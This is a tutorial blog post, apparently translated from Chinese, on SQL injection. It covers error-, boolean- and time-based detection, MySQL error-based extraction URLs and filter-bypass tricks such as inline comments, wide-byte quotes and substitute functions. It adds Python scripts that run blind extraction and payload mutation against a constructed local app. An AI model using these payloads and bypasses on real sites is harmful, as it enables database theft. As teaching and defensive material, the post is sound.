Walks

Cybersecurity enthusiast

A Brief Discussion of SQL Injection

I: Contents

1: How to identify SQL injection

2: Approaches to obtaining the data we want

3: Bypassing defenses

II: Getting started

Before getting started I want to talk about my three-way classification of SQL injection. I have read many articles, and every author divides SQL injection into many categories based on different principles; of these, the classification I agree with most is the one in the book <SQL注入与防御> (SQL Injection Attacks and Defense). It divides SQL injection into three classes: error-based, time-based and content-based (the last is also known as boolean-based blind injection). This is the view I agree with most, and the discussion below is organized by these three classes.

1: How to identify SQL injection

The general idea for deciding whether a parameter is injectable is whether we control what follows the parameter in the query, that is, whether our input is evaluated as part of the SQL statement rather than treated purely as data.

Since I divide injection into these three classes, detection naturally follows the same three lines of thinking.

Error-based: append a single quote to the parameter, e.g. id=1'. The page may throw an error, specifically the kind that displays the raw database error message. If it does, this is probably an injection point. A generic error page that shows no database message is not proof on its own; the two methods below still apply.

Content-based: with this approach we check whether we control what follows the parameter. If id=1 returns a page of data, change the parameter to id=2-1 or id=0+1 (the + must be URL-encoded as %2b, otherwise the server decodes it as a space) and see whether the returned page is identical to the one for id=1. If it is, the expression after id is being evaluated by the database, so the parameter is under our control and this is an injection point. As a control, also check that id=2 returns a different page: if every id returns the same content, the comparison tells you nothing.

Time-based: again take id=1 as the example. Append a piece of code such as and if(1=1,sleep(5),1) (MySQL syntax). This is an if statement: if 1=1 holds the database sleeps for 5 seconds, otherwise it returns 1. If the page now takes a noticeably longer time to come back, this shows an injection point: what follows id=1 is under our control. Send the control and if(1=2,sleep(5),1) as well and compare the two response times, so that ordinary network latency is not mistaken for the delay.

2: Approaches to obtaining the data we want

Error-based: personally I think error-based is the simplest, because the page returns the database's own error messages, which saves us a lot of time; if order by and similar clauses also work (for finding the column count for a UNION), things get easier still.

Here are some error-producing statements (MySQL):

Via floor() (duplicate-key error from rand(0) combined with group by; 0x7e is ~ and marks the leaked value):

http://localhost/index.php?name='+or+(select+1+from(select+count(*),concat(user(),0x7e,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+%23&pass=1

Via extractvalue() (XPATH syntax error; the leaked string is cut off at 32 characters, so page through longer values with substr()):

http://localhost/index.php?name='+or+extractvalue(1,concat(user(),0x7e,version()))+%23&pass=1

Via updatexml() (same XPATH error, same 32-character limit):

http://localhost/index.php?name='+or+updatexml(1,concat(user(),0x7e,version()),1)+%23&pass=1

Via exp() (DOUBLE value out-of-range error; no longer works on recent MySQL releases):

http://localhost/index.php?name='+or+EXP(~(SELECT+*+from(select+user())a))+%23&pass=1

Via NAME_CONST() (duplicate column name error; older MySQL versions only):

http://localhost/index.php?name='+or+(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)+%23&pass=1

Content-based: when we have an id=1 where id=2-1 returns the same page, we can construct id=2-if(user()='root',1,0). When the current user is root the if returns 1, id evaluates to 2-1=1, and the page is the same as for id=1; when the user is not root the if returns 0, id evaluates to 2-0=2, and the page differs from the id=1 page. The condition user()='root' is the part we swap out for whatever we want to test, one true/false question per request.

Time-based: this is the most time-consuming method, because the delay cannot be set too small. sleep(2), for example, delays only 2 seconds, and if the site is slow to begin with, network jitter will skew our judgement of the data.

To find the data we want with the time-based method, append a conditional to the function: if(user()='root',sleep(5),1). When user()='root' holds the response is delayed by 5 seconds, and in this way we can slowly determine the data we need.
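To make sections 1 and 2 concrete, here is an added example that is not part of the original post. It builds a stand-in for the vulnerable page (an in-memory SQLite database with constructed rows, the id parameter concatenated straight into the query, and a registered sleep() that emulates MySQL's), then runs the three detection checks from section 1 and the content-based and time-based extraction from section 2, using a binary search over the character code instead of guessing one value per request. Because the backend is SQLite, the MySQL if() and ascii() from the post appear here as CASE WHEN and unicode(); the table and column names (posts, users, pwd) and the secret value are assumptions for the example.

```python
import sqlite3
import time

# Constructed stand-in for the target (not from the post). SQLite plays MySQL,
# so the post's if()/ascii() appear below as CASE WHEN/unicode(); sleep() is
# registered as a user-defined function to emulate MySQL's.
SECRET_PWD = "pwd4"          # constructed value the extraction should recover


def make_vulnerable_app():
    """Return fetch(id_param) -> (status, body), a page that concatenates the
    id parameter straight into SQL: the flaw every section of the post relies on."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts(id INTEGER, title TEXT)")
    conn.execute("CREATE TABLE users(name TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO posts VALUES(?,?)", [(1, "first post"), (2, "second post")])
    conn.execute("INSERT INTO users VALUES('root', ?)", (SECRET_PWD,))
    conn.create_function("sleep", 1, lambda secs: time.sleep(secs) or 0)

    def fetch(id_param):
        sql = "SELECT title FROM posts WHERE id=" + id_param   # the injection point
        try:
            row = conn.execute(sql).fetchone()
        except sqlite3.Error as exc:                          # raw DB error reaches the page
            return 500, "Database error: %s" % exc
        return 200, ("Post: %s" % row[0]) if row else "Not found"
    return fetch


def timed(fetch, id_param):
    """Seconds the page took for one request."""
    start = time.perf_counter()
    fetch(id_param)
    return time.perf_counter() - start


# --- Section 1: is the parameter injectable? ---------------------------------

def detect_error_based(fetch):
    """A stray quote breaks the statement and the raw database error is shown."""
    status, body = fetch("1'")
    return status == 500 and "error" in body.lower()


def detect_content_based(fetch):
    """id=2-1 must render the id=1 page, AND id=2 must render something else;
    without the second check a page that ignores id would look injectable."""
    base = fetch("1")
    return fetch("2-1") == base and fetch("2") != base


def detect_time_based(fetch, delay=0.2):
    """True branch sleeps, false branch is the control for network latency.
    MySQL form from the post: and if(1=1,sleep(5),1) versus and if(1=2,sleep(5),1)."""
    slow = timed(fetch, "1 and (case when 1=1 then sleep(%s) else 1 end)" % delay)
    fast = timed(fetch, "1 and (case when 1=2 then sleep(%s) else 1 end)" % delay)
    return slow - fast > delay / 2


# --- Section 2: extracting data one true/false question at a time ------------

def boolean_oracle(fetch, cond):
    """id=2-(cond) evaluates to 1 (same page as id=1) iff cond holds.
    MySQL form from the post: id=2-if(cond,1,0)."""
    return fetch("2-(%s)" % cond) == fetch("1")


def time_oracle(fetch, cond, delay=0.2):
    """Same question, answered by response time instead of page content."""
    return timed(fetch, "1 and (case when (%s) then sleep(%s) else 1 end)" % (cond, delay)) > delay / 2


def bisect(oracle, int_expr, lo, hi):
    """Smallest v in [lo, hi] with int_expr <= v, in about log2(hi - lo)
    requests rather than one request per candidate value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("%s > %d" % (int_expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(oracle, subquery, max_len=64):
    """Recover the scalar `subquery` returns: length first, then each printable
    character by bisection on its code point (MySQL: ascii(substr(...,i,1)))."""
    length = bisect(oracle, "length(%s)" % subquery, 0, max_len)
    return "".join(chr(bisect(oracle, "unicode(substr(%s,%d,1))" % (subquery, i), 32, 126))
                   for i in range(1, length + 1))


if __name__ == "__main__":
    fetch = make_vulnerable_app()
    print("error-based  :", detect_error_based(fetch))
    print("content-based:", detect_content_based(fetch))
    print("time-based   :", detect_time_based(fetch))
    target = "(select pwd from users where name='root')"
    print("extracted    :", extract_string(lambda c: boolean_oracle(fetch, c), target))
```

The same bisect() loop drives both oracles; only the question changes from "is the page identical?" to "did the response take longer than the control?", which is why the time-based method costs a full sleep per true answer and is the slowest of the three.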

Overall: prefer the methods in this order:

error-based > content-based > time-based

The time-based method is by far the slowest. But when the first two are unavailable, that is, every error is turned into a uniform 404 and every response is the same page (possibly because sensitive parameters are being filtered), then if there is an injection point at all, time-based is the only method left.

3: Bypassing defenses

Inline comments (MySQL executes the body of /*! */ comments, while many filters strip or ignore comments; mixed case defeats case-sensitive keyword matching):

id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM+/*!information_schema*/.tables+/*!WHERE*/+/*!TaBlE_ScHeMa*/+like+database()-- -

Encoding bypasses:

URL encoding, ASCII, HEX (e.g. 0x7e in place of '~' needs no quotes) and Unicode encodings.

Whitespace bypasses:

Two spaces instead of one, a Tab instead of a space, or any of the alternative separators %20 %09 %0a %0b %0c %0d %a0 and the comment /**/.

Parentheses instead of spaces: in MySQL, parentheses delimit subqueries and expressions, so anything that evaluates to a value can be wrapped in parentheses and the adjacent spaces dropped, e.g. select(user())from dual where 1=1 and 2=2;

Line-break bypasses:

%0a, %0d

Wide-byte bypass:

When the single quote is escaped with a backslash (addslashes, or mysql_real_escape_string with a connection charset such as GBK that the escaping does not account for), try %bf%27 %df%27 %aa%27: the leading byte combines with the %5c of the escaping backslash into one multibyte character, and the quote survives.

Backtick ` bypass:

select `version()`; backticks can be used to get past whitespace filters and regular expressions, and in special cases can even serve as a comment delimiter.

Equivalent-function bypasses (when a function is filtered, substitute another with the same effect):

ascii() ==> hex(), bin(), ord()

sleep() ==> benchmark()

concat() ==> concat_ws(), group_concat()

substring() ==> substr(), mid()

version() ==> @@version (@@datadir is likewise a system variable; there is no datadir() function)

Example, when substring() and substr() cannot be used: ?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

Or compare the character directly, using hex literals so that no quotes are needed (0x70 is 'p'):

substr((select 'password'),1,1) = 0x70

strcmp(left('password',1), 0x69) = 1

strcmp(left('password',1), 0x70) = 0

strcmp(left('password',1), 0x71) = -1

The three strcmp() outcomes (greater, equal, less) are exactly what a binary search over the character range needs.
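As an added example that is not part of the original post, the whitespace, inline-comment and mixed-case tricks from this section are applied mechanically to one UNION payload, the variants are tested against a constructed keyword blacklist of the kind they are meant to defeat, and then run through a normalizer that undoes them. The payload, the blacklist and the normalizer are all assumptions for this example. Only the filter side is checked here: /*! */ executed comments are MySQL-specific, so no database is involved.

```python
import re

# Constructed UNION payload for this example, in decoded form (what the server
# sees after URL decoding; in the URL the spaces would be + or %20).
PAYLOAD = ("1 union select 1,2,table_name from information_schema.tables "
           "where table_schema like database()")

KEYWORDS = ("union", "select", "from", "where")

# Hypothetical blacklist of the kind seen in hand-written filters: a keyword
# only counts when delimited by literal spaces. Constructed for this example.
NAIVE_RULE = re.compile(r"(^| )(%s)( |$)" % "|".join(KEYWORDS), re.I)


def naive_filter(param):
    """True if the naive blacklist lets the (decoded) parameter through."""
    return NAIVE_RULE.search(param) is None


def mixed_case(word):
    """UnIoN-style casing, for filters that compare exact lowercase keywords."""
    return "".join(c.upper() if i % 2 == 0 else c for i, c in enumerate(word))


def via_inline_comments(payload):
    """Inline comments: MySQL executes the body of /*!...*/ and the comment
    itself separates tokens, so the spaces around each keyword can go."""
    pattern = r"\s*\b(%s)\b\s*" % "|".join(KEYWORDS)
    return re.sub(pattern, lambda m: "/*!%s*/" % mixed_case(m.group(1)), payload, flags=re.I)


def via_whitespace(payload, sep):
    """Whitespace bypass: /**/, tab (%09), newline (%0a) and the other
    separators listed above all split tokens the way a space does."""
    return payload.replace(" ", sep)


def mutate(payload):
    """All variants of one payload, keyed by the technique that produced them."""
    return {
        "inline_comments": via_inline_comments(payload),
        "comment_as_space": via_whitespace(payload, "/**/"),
        "tab_as_space": via_whitespace(payload, "\t"),
        "newline_as_space": via_whitespace(payload, "\n"),
    }


def normalize(param):
    """What a filter should match on instead: executed comments keep their
    body, ordinary comments become a separator, whitespace collapses and case
    is folded. Every variant above maps back to the original statement."""
    s = re.sub(r"/\*!(.*?)\*/", r" \1 ", param)
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).strip().lower()


if __name__ == "__main__":
    print("raw payload passes filter:", naive_filter(PAYLOAD))
    for name, variant in mutate(PAYLOAD).items():
        print("%-17s passes=%-5s same_sql=%s" % (
            name, naive_filter(variant), normalize(variant) == normalize(PAYLOAD)))
```

Every variant passes the naive filter while normalizing back to the original statement, which is the point of this section: a blacklist that matches raw input is defeated by these techniques, so matching must happen after normalization, and parameterized queries, which remove the injection point altogether, remain the only robust fix.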